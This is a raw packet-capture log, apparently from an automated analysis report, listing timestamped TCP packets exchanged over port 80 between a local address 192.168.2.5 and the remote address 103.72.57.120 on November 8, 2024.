                                                                      Nov 8, 2024 18:11:02.734286070 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.734339952 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.734366894 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.734390974 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.734397888 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.734432936 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.734437943 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.734468937 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.734478951 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.734515905 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.734524965 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.734560013 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.734568119 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.734601021 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.734913111 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.734925985 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.734936953 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.734946966 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.734956980 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.734978914 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.735009909 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.735399961 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.735409975 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.735444069 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.735456944 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.735480070 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.735519886 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.735562086 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.735574961 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.735586882 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.735598087 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.735604048 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.735610962 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.735613108 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.735632896 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.735662937 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.736366987 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.736378908 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.736392021 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.736422062 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.736452103 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.736464977 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.736476898 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.736485958 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.736537933 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.736537933 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.736561060 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.737251997 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.737263918 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.737276077 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.737309933 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.737329006 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.737334967 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.737350941 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.737363100 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.737380028 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.737391949 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.738044024 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.738095045 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.949724913 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.949867010 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.949875116 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.949877024 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.949898958 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.949911118 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.949960947 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.950021029 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.950032949 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.950043917 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.950086117 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.950175047 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.950198889 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.950215101 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.950268984 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.950272083 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.950323105 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.950330973 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.950342894 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.950407982 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.950489998 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.950598955 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.950604916 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.950608969 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.950654984 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.950668097 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.950680017 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.950691938 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.950706005 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.950798988 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.951047897 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.951097965 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.951109886 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.951124907 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.951155901 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.951167107 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.951178074 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.951210022 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.951293945 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.951666117 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.951677084 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.951689005 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.951744080 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.951745987 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.951833010 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.951895952 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.951939106 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.951950073 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.951960087 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.951982021 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.952018023 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.952028990 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.952039957 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.952052116 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.952061892 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.952064037 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.952080011 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.952157974 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.952953100 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.952966928 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.952976942 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.952991009 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.953007936 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.953017950 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.953028917 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.953033924 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.953042030 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.953053951 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.953063965 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.953089952 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.953146935 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.953754902 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.953766108 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.953775883 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.953788042 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.953835964 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.953883886 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.165688038 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.165709019 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.165719032 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.165743113 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.165755033 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.165766001 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.165767908 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.165803909 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.165877104 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.165903091 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.165916920 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.165916920 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.165947914 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.165956020 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.165970087 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.165982008 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.166001081 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.166007042 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.166028023 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.166038036 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.166178942 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.166218996 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.166230917 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.166243076 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.166256905 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.166266918 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.166282892 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.166299105 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.166383982 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.166394949 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.166404963 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.166426897 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.166456938 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.166479111 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.166490078 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.166502953 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.166551113 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.166764975 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.166819096 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.166845083 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.166881084 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.166904926 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.166917086 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.166929007 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.166944981 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.166965961 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.166979074 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.167089939 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167100906 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167112112 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167134047 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.167150974 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167154074 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.167164087 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167175055 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167184114 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.167213917 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.167531967 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167558908 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167571068 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167572975 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.167582989 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167601109 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.167623043 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.167720079 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167732000 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167743921 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167758942 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.167779922 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.167783022 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167795897 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167813063 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167824030 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.167824984 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167848110 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.167851925 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167864084 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167870045 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.167875051 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167886972 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167896986 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.167898893 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.167922020 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.167939901 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.168514967 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.168526888 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.168544054 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.168553114 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.168555021 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.168565989 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.168574095 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.168577909 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.168581963 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.168592930 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.168603897 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.168612003 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.168616056 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.168627977 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.168629885 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.168658972 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.168663025 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.168674946 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.168685913 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.168687105 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.168698072 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.168711901 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.168714046 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.168737888 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.168756962 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.169454098 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.169491053 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.169558048 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.169569969 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.169580936 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.169590950 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.169601917 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.169604063 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.169615030 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.169621944 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.169630051 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.169640064 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.169651985 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.169653893 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.169663906 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.169672966 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.169677973 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.169692993 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.169717073 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.393718958 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.393740892 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.393754959 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.393767118 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.393785000 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.393794060 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.393796921 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.393810034 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.393821955 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.393831015 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.393836975 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.393838882 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.393857002 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.393882990 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.393902063 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.393914938 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.393933058 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.393946886 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.393951893 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.393951893 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.393964052 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.393973112 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.393975973 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.393987894 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.393996954 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394000053 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394012928 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394025087 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394025087 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394042015 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394049883 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394062042 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394062042 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394087076 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394093990 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394108057 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394112110 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394124985 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394133091 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394135952 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394149065 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394154072 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394161940 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394174099 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394175053 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394188881 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394196987 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394201040 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394212008 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394218922 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394232988 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394243002 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394244909 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394258022 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394270897 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394274950 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394289017 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394313097 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394316912 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394330025 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394340038 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394354105 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394356012 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394366980 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394372940 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394378901 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394390106 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:03.394392967 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:03.394416094 CET4995080192.168.2.5103.72.57.120
